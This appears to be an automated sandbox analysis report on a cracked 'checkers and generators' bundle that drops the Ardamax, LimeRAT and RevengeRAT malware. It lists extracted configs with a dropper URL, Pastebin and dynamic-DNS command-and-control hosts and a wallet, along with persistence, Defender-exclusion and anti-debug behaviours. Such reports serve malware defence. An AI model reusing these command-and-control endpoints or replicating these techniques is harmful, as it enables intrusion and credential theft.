ardamax | hxxps://paste[.]fo/9253e43132b4

Resubmissions

03-11-2024 12:27

241103-pm75eawrhr 10

03-11-2024 12:08

241103-pa16bstcrf 8

Analysis

max time kernel
1006s
max time network
1056s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
03-11-2024 12:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://paste.fo/9253e43132b4

Score

10^/10

ardamax limerat revengerat papa agilenet discovery execution keylogger persistence privilege_escalation rat stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://6.top4top.net/p_13529t6r71.jpg

Extracted

Family

limerat

Wallets

1JBKLGyE6AnRGvk92A8x3m8qmXfh3fcEty

Attributes

aes_key
nulled
antivm
true
c2_url
https://pastebin.com/raw/cXuQ0V20
delay
33
download_payload
false
install
false
install_name
dual.exe
main_folder
AppData
pin_spread
false
sub_folder
\DualCore\
usb_spread
true

Extracted

Family

revengerat

Botnet

papa

papa.hopto.org:3344

Mutex

RV_MUTEX-cawrHJfWfhaRC

Extracted

Family

limerat

Attributes

antivm
false
c2_url
https://pastebin.com/raw/cXuQ0V20
download_payload
false
install
false
pin_spread
false
usb_spread
false

Signatures

Ardamax
A keylogger first seen in 2013.
keylogger stealer ardamax
Ardamax family
ardamax
LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
Limerat family
limerat
RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat
Revengerat family
revengerat

RevengeRat Executable 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/3468-5759-0x0000000006F10000-0x0000000006F18000-memory.dmp	revengerat

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

870 5388 powershell.exe
874 5388 powershell.exe
877 5432 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1040 powershell.exe
340 powershell.exe
5388 powershell.exe
5432 powershell.exe
3468 powershell.exe
Downloads MZ/PE file

flow	pid	process
870	5388	powershell.exe
874	5388	powershell.exe
877	5432	powershell.exe

pid	process
1040	powershell.exe
340	powershell.exe
5388	powershell.exe
5432	powershell.exe
3468	powershell.exe

Checks computer location settings 2 TTPs 23 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Runtime Explorer.exeNetflix by GOD Cracked By GM`ka.exeWScript.exeNetFlix GC Checker by xRisky.exeWindows Services.exeLauncher.exeMult-Cracked.exeWScript.exeNetflix GC Cracked.to.execombolist generator BY X-KILLER.exeNetflix GC Cracked.to.exeNetFlix GC Checker by xRisky.exeWScript.exeMinecraft Generator By Zed.exeMultichecker 1.05.exeProxy Generator 1.3.6 BETA.exeprocs.exeNetflix Checker v0.2.1.exeAmadey Cracked [XakFor.Net].exeBetaBotBuilderGUI.exelib.exeNetflix GC Cracked.to.exeMultichecker 1.05.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Runtime Explorer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Netflix by GOD Cracked By GM`ka.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	NetFlix GC Checker by xRisky.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Windows Services.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Mult-Cracked.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Netflix GC Cracked.to.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	combolist generator BY X-KILLER.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Netflix GC Cracked.to.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	NetFlix GC Checker by xRisky.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Minecraft Generator By Zed.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Multichecker 1.05.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Proxy Generator 1.3.6 BETA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	procs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Netflix Checker v0.2.1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Amadey Cracked [XakFor.Net].exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	BetaBotBuilderGUI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	lib.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Netflix GC Cracked.to.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	Multichecker 1.05.exe

Drops startup file 3 IoCs

Processes:

Launcher.exeWScript.exeWScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk	Launcher.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KBnSgEeuZWeY.lnk	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoYUIXZO.lnk	WScript.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 54 IoCs

Processes:

7z2408-x64.exe7zFM.exe7zFM.execombolist generator BY X-KILLER.exeLauncher.exeSaveSoft.exeWindows Services.exeSecure System Shell.exeRuntime Explorer.exeMultichecker 1.05.exeLauncher.exexnet.exeMult-Cracked.exeLauncher.exesysMult.exeMultichecker 1.05.exeLauncher.exexnet.exeNetflix GC Cracked.to.exeLauncher.exeGC.exeNetFlix GC Checker by xRisky.exeLauncher.exelitedb.exeProxy Generator 1.3.6 BETA.exeLauncher.exesysBeta.exeNetflix by GOD Cracked By GM`ka.exeLauncher.exeprocs.exeChecker Netflix.exeNetflix Checker v0.2.1.exeLauncher.exesys.exe7zFM.exeAmadey Cracked [XakFor.Net].exeLauncher.exesvg.exeBetaBotBuilderGUI.exeLauncher.exesecur32.exeMinecraft Generator By Zed.exeLauncher.exelib.exeUMT.exeNetflix GC Cracked.to.exeLauncher.exeGC.exeNetflix GC Cracked.to.exeLauncher.exeGC.exeNetFlix GC Checker by xRisky.exeLauncher.exelitedb.exe

pid	process
5192	7z2408-x64.exe
6056	7zFM.exe
2192	7zFM.exe
1804	combolist generator BY X-KILLER.exe
3356	Launcher.exe
5928	SaveSoft.exe
4464	Windows Services.exe
1260	Secure System Shell.exe
2016	Runtime Explorer.exe
236	Multichecker 1.05.exe
4504	Launcher.exe
6008	xnet.exe
1204	Mult-Cracked.exe
2516	Launcher.exe
5792	sysMult.exe
5896	Multichecker 1.05.exe
568	Launcher.exe
644	xnet.exe
3056	Netflix GC Cracked.to.exe
4852	Launcher.exe
4168	GC.exe
5388	NetFlix GC Checker by xRisky.exe
5304	Launcher.exe
4192	litedb.exe
5512	Proxy Generator 1.3.6 BETA.exe
5244	Launcher.exe
5728	sysBeta.exe
5908	Netflix by GOD Cracked By GM`ka.exe
5288	Launcher.exe
6128	procs.exe
712	Checker Netflix.exe
4100	Netflix Checker v0.2.1.exe
5252	Launcher.exe
1960	sys.exe
3320	7zFM.exe
4176	Amadey Cracked [XakFor.Net].exe
4852	Launcher.exe
4288	svg.exe
568	BetaBotBuilderGUI.exe
5896	Launcher.exe
2524	secur32.exe
12680	Minecraft Generator By Zed.exe
12756	Launcher.exe
12808	lib.exe
12908	UMT.exe
13020	Netflix GC Cracked.to.exe
13088	Launcher.exe
13148	GC.exe
13872	Netflix GC Cracked.to.exe
14016	Launcher.exe
14108	GC.exe
5856	NetFlix GC Checker by xRisky.exe
1876	Launcher.exe
3984	litedb.exe

Loads dropped DLL 64 IoCs

Processes:

7zFM.exe7zFM.exeLauncher.exeSaveSoft.exeLauncher.exeLauncher.exesysMult.exeLauncher.exeLauncher.exeGC.exeLauncher.exelitedb.exeLauncher.exeLauncher.exeLauncher.exe7zFM.exeLauncher.exeLauncher.exeLauncher.exeUMT.exeRuntime Explorer.exepowershell.exeNetflix GC Cracked.to.exeLauncher.exeGC.exeNetflix GC Cracked.to.exeLauncher.exeGC.exe

pid	process
3672
6056	7zFM.exe
2192	7zFM.exe
3356	Launcher.exe
3356	Launcher.exe
5928	SaveSoft.exe
4504	Launcher.exe
4504	Launcher.exe
2516	Launcher.exe
2516	Launcher.exe
5792	sysMult.exe
5792	sysMult.exe
568	Launcher.exe
568	Launcher.exe
4852	Launcher.exe
4852	Launcher.exe
4168	GC.exe
4168	GC.exe
5304	Launcher.exe
5304	Launcher.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
4192	litedb.exe
5244	Launcher.exe
5244	Launcher.exe
5288	Launcher.exe
5288	Launcher.exe
5252	Launcher.exe
5252	Launcher.exe
3320	7zFM.exe
4852	Launcher.exe
4852	Launcher.exe
5896	Launcher.exe
5896	Launcher.exe
12756	Launcher.exe
12756	Launcher.exe
12908	UMT.exe
12908	UMT.exe
2016	Runtime Explorer.exe
2016	Runtime Explorer.exe
12756	Launcher.exe
12756	Launcher.exe
5432	powershell.exe
5432	powershell.exe
13020	Netflix GC Cracked.to.exe
13020	Netflix GC Cracked.to.exe
13088	Launcher.exe
13088	Launcher.exe
13088	Launcher.exe
13088	Launcher.exe
13148	GC.exe
13148	GC.exe
13148	GC.exe
13148	GC.exe
13872	Netflix GC Cracked.to.exe
13872	Netflix GC Cracked.to.exe
14016	Launcher.exe
14016	Launcher.exe
14016	Launcher.exe
14016	Launcher.exe
14108	GC.exe
14108	GC.exe
14108	GC.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral1/memory/4192-5632-0x00000000056C0000-0x00000000059BC000-memory.dmp	agile_net

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Launcher.exeRuntime Explorer.exeUMT.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe"	Launcher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "\"C:\\Users\\Admin\\AppData\\Roaming\\Runtime Explorer.exe\""	Runtime Explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UMT Start = "C:\\ProgramData\\NSGMFX\\UMT.exe"	UMT.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 64 IoCs

Processes:

7zFM.exe7zFM.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\Gift Card Generator By MT_SOFT\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Anatomy Fortnite Skin Checker\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\CHECKER Uplay BY SPACEMAN\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\MultiChecker 1.05 Cracked By Devil\data\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Walmart Checker Zer0n\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\BreakingNord Checker (NordVPN)\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\HBO GO CHECKER\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Origin Games Checker\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Godaddy.com REG CHECKER BY ZARAMSIM Fixed By x-slayer.fun\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Instagram Account Checker By Amir v0.1\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Netflix Checker v0.2.1\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\Proxy Generator 1.3.6 BETA\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\Steam Account Generator\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Bohoo Accounts Checker By X-SLAYER\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Checker N3tflix Cracked BY Scorpio\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\freebitco.in Checker Account By X-KILLER\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\SteamBrute_ShaOnKrisTof\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Netflix Checker v0.2.1\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Netflix Checker V3.1 by Cetrix\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\PlaystationChecker V2 - Cracked By PC-RET\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\TSP Dork generator v8.0\Data\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Checker Wish By X-KILLER\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Ipvanich vpn CHECKER V0.1 By scorpio#7447\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\NordVpn Checker Account By X-KILLER\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Spotify Checker - SpotHear\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\Stolen Nitro Discord Code Generator\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\CyberGhost VPN Checker by xRisky\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Hulu Checker by RubiconT\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\LOL Checker by AC - Cleaned\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\PlaystationChecker V2 - Cracked By PC-RET\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Steam Checker by Mr.ViPER\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\TSP Dork generator v8.0\Data\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\Uplay Account Generator - Freedom FoxY\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\BreakingNord Checker (NordVPN)\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Hulu Checker by RubiconT\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\LOL Checker by AC - Cleaned\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Instagram Brute Checker By Draingrom\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\PornHub Checker\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\RDP xtscrack Cracker 0.9\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\TSP Dork generator v8.0\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\CyberGhost VPN Checker by xRisky\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\GoldFlix GC Netflix Checker\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Grammarly Checker By X-SLAYER\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Hide My Ass Checker by xRisky\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Valid Email BruteChecker [1.1] - by thekorol\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Instagram Brute Checker By Draingrom\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\Steam Account Generator\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\ebay Checker Account By X-KILLER\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Email Access Checker _atr3\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\HideMyAss! checker BY X-KILLER\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Instagram Account Checker By Amir v0.1\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Minecraft Checker by xRisky\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\NordVPN Checker by Monacoa - [xRisky]\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\RDP Cracker\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\Minecraft Generator By Zed\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\FortNite Brute Checker 1 0 0 - Cracked By PC-RET\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Psn Checker V0.1 By Scoroio\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Spotify Checker By DJR - Cracked by FullMoonSword\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Steam Cracker - [IP-REC]\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\In Shadow Batch Virus Gen - 5.0.0 - MOD\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE8A70F11A\Generators PACK\Keyword Generator v1 0\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\Discord Agora's Token Checker\Virus Total\desktop.ini	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\MultyX Cracked v1.5\Data\Virus Total\desktop.ini	7zFM.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\7zE09886E5A\Checkers PACK\NordVPN Checker by Monacoa - [xRisky]\Virus Total\desktop.ini	7zFM.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

876 pastebin.com
877 pastebin.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

secur32.exe

pid process

2524 secur32.exe
2524 secur32.exe
2524 secur32.exe
2524 secur32.exe
2524 secur32.exe

flow	ioc
876	pastebin.com
877	pastebin.com

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	powershell.exe

pid	process
2524	secur32.exe
2524	secur32.exe
2524	secur32.exe
2524	secur32.exe
2524	secur32.exe

Drops file in Program Files directory 64 IoCs

Processes:

7z2408-x64.exesetup.exe

description	ioc	process
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mr.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\yo.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ca.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mn.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sw.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tg.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-tw.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.dll	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hy.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kaa.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\da.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz-cyrl.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bg.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nl.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sv.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lt.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\et.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ja.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku-ckb.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\vi.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pa-in.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fr.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\es.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ga.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sa.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\co.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\si.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ug.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fy.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ky.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng2.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ba.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uk.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gl.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt	7z2408-x64.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241103122847.pma	setup.exe

Drops file in Windows directory 8 IoCs

Processes:

Launcher.exe

description	ioc	process
File created	C:\Windows\IMF\LICENCE.zip	Launcher.exe
File created	C:\Windows\IMF\LICENCE.dat	Launcher.exe
File created	C:\Windows\IMF\Runtime Explorer.exe.tmp	Launcher.exe
File opened for modification	C:\Windows\IMF\Runtime Explorer.exe	Launcher.exe
File created	C:\Windows\IMF\Windows Services.exe.tmp	Launcher.exe
